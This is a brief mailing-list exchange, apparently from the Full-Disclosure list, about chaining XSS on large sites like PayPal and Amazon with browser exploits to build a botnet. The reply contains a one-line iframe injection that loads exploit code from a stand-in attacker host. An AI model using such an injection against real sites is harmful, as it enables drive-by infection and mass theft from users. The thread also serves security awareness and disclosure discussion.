Does anybody happen to realize that XSS vulnerabilities make it simpler to leverage other vulnerabilities? I mean, credential stealing is only the beginning. Try loading WMF/JPEG/DCOM/AJAX/etc exploit code using an XSS vulnerability on PayPal/Yahoo/Amazon/etc, sending the link off to millions of people, and receiving several thousand bots to your IRC channel.
yes! all pray to <iframe src=http://HAXOR-URL/EXPLOIT></iframe> _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/